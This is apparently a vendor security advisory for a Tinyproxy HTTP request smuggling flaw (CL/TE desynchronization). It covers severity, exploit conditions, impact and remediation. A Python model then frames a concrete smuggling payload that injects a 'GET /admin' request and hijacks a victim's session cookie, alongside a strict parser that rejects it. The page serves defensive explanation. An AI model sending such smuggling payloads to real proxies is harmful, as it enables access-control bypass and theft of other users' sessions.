CVE-2026-54387: Tinyproxy - HTTP Request Smuggling via CL/TE Desynchronization
Tinyproxy through 1.11.3, fixed in commit ff45d3b, fails to reconcile conflicting Content-Length and Transfer-Encoding: chunked headers, forwarding both verbatim to the backend while using Content-Length to determine how many request body bytes to consume. Remote attackers can desynchronize the proxy and backend parser state, allowing injection of arbitrary HTTP requests to the backend to enable cache poisoning, access control bypass, and request hijacking.
Metrics
- CVSS v4.0: 9.3
- Severity: CRITICAL
- Fixed in: ff45d3bf0e61d0f8ed97ab379d3047f04eb67521
- Affected Products: 1
HarborGuard Analysis
Synopsis
HTTP request smuggling via CL/TE desynchronization in Tinyproxy affects versions through 1.11.3. The flaw is reachable over the network with no authentication required, as Tinyproxy forwards conflicting Content-Length and Transfer-Encoding: chunked headers verbatim to the backend while using only Content-Length to measure how many body bytes to consume. Successful exploitation lets a remote attacker inject arbitrary HTTP requests into the backend connection, enabling cache poisoning, access control bypass, and request hijacking. A patched-image rebuild pinned to commit ff45d3bf0e61d0f8ed97ab379d3047f04eb67521 is available on HarborGuard for environments running an affected version.
HarborGuard Coverage
Detection of CVE-2026-54387 is available across every HarborGuard environment; the CVE is ingested from upstream advisory feeds within minutes of publication and matched against all customer images in connected registries and CI pipelines, including custom-built images that bundle Tinyproxy. Coverage extends to any image layer that carries an affected version of the tinyproxy binary, regardless of base image.
Triage is available with a CVSS v4.0 score of 9.3 (Critical) pre-populated, and per-environment compliance policy weighting can escalate or refine priority before the finding is routed to the appropriate team inbox inside each customer organization.
A patched-image rebuild at commit ff45d3bf0e61d0f8ed97ab379d3047f04eb67521 is available on HarborGuard the moment the upstream fix is matched to an affected image. For customers who opt into auto-remediation, HarborGuard can trigger a rebuild, run a regression test suite against the new image, and open a pull request against affected workloads automatically.
Exploit Conditions
- Network reachability: Required
The attacker must reach the Tinyproxy service over the network; no local or physical access is needed, and any internet-exposed or internally reachable proxy instance is in scope.
- Authentication: Not required
No credentials or session token are required; the attacker sends a crafted HTTP request as an anonymous client.
- Victim interaction: Not required
Exploitation is entirely server-side; no user needs to click a link, open a file, or take any action for the attack to succeed.
- Attack complexity: Low
The exploit is reliable and condition-free; no race condition, memory layout dependency, or special environment state is needed to trigger the header desynchronization.
Blast Radius
- Reads any HTTP request body or header content transiting the proxy, including session tokens, credentials, and customer data forwarded to the backend.
- Injects arbitrary requests into the backend connection, overwriting or poisoning cached responses and causing other users to receive attacker-controlled content.
- Bypasses access controls enforced at the proxy layer by smuggling requests that the proxy never evaluates but the backend executes.
- Hijacks in-flight requests from other clients sharing the same backend connection, allowing the attacker to capture or manipulate their responses.
How HarborGuard Handles This
Available on HarborGuard: detection for CVE-2026-54387 activates automatically for any image found carrying Tinyproxy 1.11.3 or earlier. A rebuild pinned to the upstream fix commit (ff45d3bf0e61d0f8ed97ab379d3047f04eb67521) is made available as soon as the affected image is identified. Where compliance policy permits auto-remediation, HarborGuard can rebuild the image, execute a regression test run, and open a pull request against affected workloads; for high and critical severity issues, the median time from CVE publication to a merged patch PR is around 90 minutes in environments with auto-remediation enabled. For teams that prefer a manual review gate, the finding is routed to the configured team inbox with full CVSS context and a direct reference to the fix commit. Until a rebuild is deployed, consider isolating Tinyproxy instances behind a network policy that restricts which clients can send requests (this only helps while every permitted client is trusted, since any client that can reach the proxy can send the crafted request), and review whether backend services can independently validate or reject ambiguous transfer-encoding headers as a compensating control. RFC 7230 section 3.3.3 requires a recipient that sees both Content-Length and Transfer-Encoding to either treat the message as an error or honour Transfer-Encoding and ignore Content-Length; a backend that responds 400 and closes the connection never parses past the ambiguous request, so the leftover bytes cannot become a second request.
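The desynchronization the synopsis describes and the compensating check suggested above, as an added illustration written for this page (not Tinyproxy's or HarborGuard's code): three simplified HTTP/1.1 request framers consume the same byte stream. `frame_cl_only` models the proxy behaviour the advisory describes (Content-Length sizes the body, both headers forwarded), `frame_te_first` models a backend that follows RFC 7230 section 3.3.3 and lets `Transfer-Encoding: chunked` override Content-Length, and `frame_strict` is the compensating control of refusing any message carrying both headers. The framers, the attack bytes, the `backend` host name, the `/admin` and `/profile` paths and the victim's cookie are all constructed for this example and are not taken from the advisory.

```python
"""Constructed model of the CL/TE desync described in this advisory.

Not Tinyproxy's code: the framers below are simplified and modelled on the
advisory's description, not on Tinyproxy's source.
"""
from dataclasses import dataclass


@dataclass
class Framed:
    head: bytes  # request line and headers, as this parser delimited them
    body: bytes  # body bytes this parser attributed to the request
    rest: bytes  # bytes this parser leaves for the next request on the connection


def _split_head(stream: bytes) -> tuple[bytes, dict[str, str], bytes]:
    """Split off request line and headers; return (head, lowercased headers, remainder)."""
    head, sep, rest = stream.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head")
    headers: dict[str, str] = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("ascii")] = value.strip().decode("ascii")
    return head + sep, headers, rest


def _read_chunked(data: bytes) -> tuple[bytes, bytes]:
    """Decode a chunked body; return (body, bytes after the terminating chunk)."""
    body = b""
    while True:
        size_line, _, data = data.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)  # ignore chunk extensions
        if size == 0:
            # Skip the (possibly empty) trailer section up to its blank line.
            while True:
                line, _, data = data.partition(b"\r\n")
                if line == b"":
                    return body, data
        body += data[:size]
        data = data[size + 2:]  # drop the CRLF that follows each chunk


def frame_cl_only(stream: bytes) -> Framed:
    """Proxy behaviour from the advisory: Content-Length alone sizes the body."""
    head, headers, rest = _split_head(stream)
    n = int(headers.get("content-length", "0"))
    return Framed(head, rest[:n], rest[n:])


def frame_te_first(stream: bytes) -> Framed:
    """RFC 7230 backend behaviour: chunked transfer-coding overrides Content-Length."""
    head, headers, rest = _split_head(stream)
    if "chunked" in headers.get("transfer-encoding", "").lower():
        body, rest = _read_chunked(rest)
        return Framed(head, body, rest)
    n = int(headers.get("content-length", "0"))
    return Framed(head, rest[:n], rest[n:])


def frame_strict(stream: bytes) -> Framed:
    """Compensating control: refuse any request that carries both framing headers."""
    _, headers, _ = _split_head(stream)
    if "content-length" in headers and "transfer-encoding" in headers:
        raise ValueError("400 Bad Request: Content-Length and Transfer-Encoding both present")
    return frame_te_first(stream)


# Constructed attack traffic; host name, paths and cookie are placeholders.
# The smuggled prefix deliberately lacks its terminating CRLF CRLF so that the
# backend splices the next client's request onto it.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: backend\r\nX-Ignore: "
ATTACK_BODY = b"0\r\n\r\n" + SMUGGLED
ATTACK = (
    b"POST / HTTP/1.1\r\nHost: backend\r\n"
    + b"Content-Length: %d\r\n" % len(ATTACK_BODY)
    + b"Transfer-Encoding: chunked\r\n\r\n"
    + ATTACK_BODY
)
VICTIM = b"GET /profile HTTP/1.1\r\nHost: backend\r\nCookie: session=victim\r\n\r\n"


def proxy_view(stream: bytes = ATTACK) -> Framed:
    """How the proxy frames the attacker's bytes: one complete POST, nothing left over."""
    return frame_cl_only(stream)


def backend_view(stream: bytes = ATTACK) -> Framed:
    """How the backend frames the same bytes: an empty POST body and a dangling prefix."""
    return frame_te_first(stream)


def hijacked_request(victim: bytes = VICTIM) -> Framed:
    """The next request the backend sees: the smuggled prefix wearing the victim's headers."""
    leftover = frame_te_first(ATTACK).rest
    return frame_te_first(leftover + victim)


def strict_rejects(stream: bytes = ATTACK) -> bool:
    """True if the strict framer refuses the ambiguous request outright."""
    try:
        frame_strict(stream)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("proxy forwards", len(proxy_view().body), "body bytes; leftover:", proxy_view().rest)
    print("backend body:", backend_view().body, "leftover:", backend_view().rest)
    print("backend's next request head:\n" + hijacked_request().head.decode())
    print("strict backend rejects:", strict_rejects())
```

The proxy applies its access checks to the `POST /` it framed and never sees `GET /admin`; the backend, having consumed only the zero-length chunked body, treats the leftover prefix as the start of the next request and completes it with the victim's headers, which is the access-control bypass and request hijacking the blast radius lists. The strict framer shows why a backend that refuses ambiguous framing is a workable stop-gap until the rebuilt image ships.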
- tinyproxy / tinyproxy: ≤ 1.11.3, fixed in ff45d3bf0e61d0f8ed97ab379d3047f04eb67521
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N